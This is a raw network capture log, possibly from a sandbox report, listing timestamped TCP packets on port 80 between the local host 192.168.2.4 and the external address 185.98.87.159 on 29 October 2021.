Oct 29, 2021 20:50:05.074019909 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074035883 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074053049 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074068069 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074081898 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074098110 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.074141026 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.074249983 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074268103 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074284077 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074301004 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.074321032 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.074356079 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125459909 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125485897 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125503063 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125521898 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125540018 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125550032 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125556946 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125575066 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125592947 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125602007 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125611067 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125628948 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125628948 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125647068 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125663996 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125680923 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125689983 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125696898 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125724077 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125746965 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125752926 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125771046 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125790119 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125808954 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125823975 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.125827074 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125844955 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.125859976 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.129437923 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177063942 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177089930 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177103996 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177119970 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177135944 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177154064 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177169085 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177185059 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177201986 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177217960 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177236080 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177242994 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177253008 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177268982 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177287102 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177320004 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177352905 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177419901 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177443027 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177463055 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177483082 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177484989 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177503109 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177520990 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177521944 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177540064 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177556992 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177572966 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177588940 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177606106 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177604914 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177623987 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177640915 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177644968 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177659035 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177674055 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177706003 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.177913904 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177933931 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177951097 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177966118 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177983046 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.177990913 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.178009033 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.178028107 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.178050995 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.178051949 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.178067923 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.178111076 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.178148031 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.178164005 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.178215027 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.180946112 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.180967093 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.181113005 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.184541941 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.185182095 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.228693962 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228718996 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228735924 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228753090 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228769064 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228785992 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.228837013 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.228878021 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.228990078 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229007959 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229024887 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229048014 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229055882 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229073048 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229089975 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229099035 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229124069 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229304075 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229321003 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229337931 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229355097 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229370117 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229371071 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229388952 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229404926 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229409933 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229420900 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229437113 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229439020 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229455948 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229456902 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229473114 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229490042 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229492903 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229506016 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229523897 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229526997 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229541063 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229556084 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229572058 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229576111 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229588985 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229610920 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229634047 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229760885 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229825974 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229859114 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229890108 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229897022 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229907036 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229924917 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.229924917 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229943991 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.229960918 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.230252028 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230293036 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.230330944 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230348110 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230364084 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230381966 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.230412006 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230428934 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230444908 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.230463028 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.230496883 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.235732079 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.235790014 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.235851049 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.236426115 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.236443043 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.236469030 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.236481905 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.236485004 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.236531973 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.280174017 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.280277014 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.280370951 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.280519009 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.331707954 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:06.729463100 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.781168938 CEST	80	49826	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:06.782582998 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.782704115 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.782725096 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.865062952 CEST	80	49826	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:06.865272999 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.865856886 CEST	49826	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.909818888 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.917511940 CEST	80	49826	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:06.961517096 CEST	80	49827	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:06.961945057 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.962233067 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:06.962260008 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.041573048 CEST	80	49827	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.041709900 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.041949034 CEST	49827	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.091609001 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.094584942 CEST	80	49827	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.143802881 CEST	80	49829	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.144109011 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.144289970 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.144308090 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.223151922 CEST	80	49829	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.225822926 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.233568907 CEST	49829	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.264177084 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.285501003 CEST	80	49829	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.316188097 CEST	80	49830	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.317380905 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.317502975 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.317523003 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.396713018 CEST	80	49830	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.398215055 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.400616884 CEST	49830	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.429270029 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.452555895 CEST	80	49830	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.481616974 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.482055902 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.482285023 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.482296944 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.557909012 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.557934999 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.557950974 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.557971954 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.557987928 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.558001041 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.558027029 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.558046103 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.558063984 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.558067083 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.558072090 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.558084965 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.558115959 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.558139086 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.559319019 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610347033 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610383987 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610409975 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610440969 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610455036 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610474110 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610502958 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610505104 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610538960 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610568047 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610594988 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610598087 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610630035 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610642910 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610660076 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610677958 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610691071 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610724926 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610754967 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610783100 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.610784054 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610812902 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.610816956 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.611416101 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.611452103 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.611480951 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.611496925 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.611502886 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.611574888 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663372993 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663402081 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663422108 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663444042 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663464069 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663472891 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663484097 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663505077 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663511038 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663526058 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663536072 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663547993 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663563967 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663568020 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663593054 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663614035 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663614035 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663635969 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663655996 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663674116 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663676023 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663697004 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663705111 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663733959 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663834095 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663870096 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663892984 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663911104 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.663912058 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.663954020 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664000034 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664022923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664041996 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664062977 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664077044 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664104939 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664109945 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664125919 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664148092 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664163113 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664170027 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664266109 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664288998 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664302111 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664309025 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664330959 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664350033 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664370060 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664380074 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664401054 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664421082 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664438009 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664442062 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664486885 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664582968 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664603949 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664624929 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664644003 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.664663076 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.664693117 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.715728045 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715751886 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715766907 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715783119 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715804100 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.715814114 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715831995 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715846062 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.715847969 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715866089 CEST	80	49831	185.98.87.159	192.168.2.4
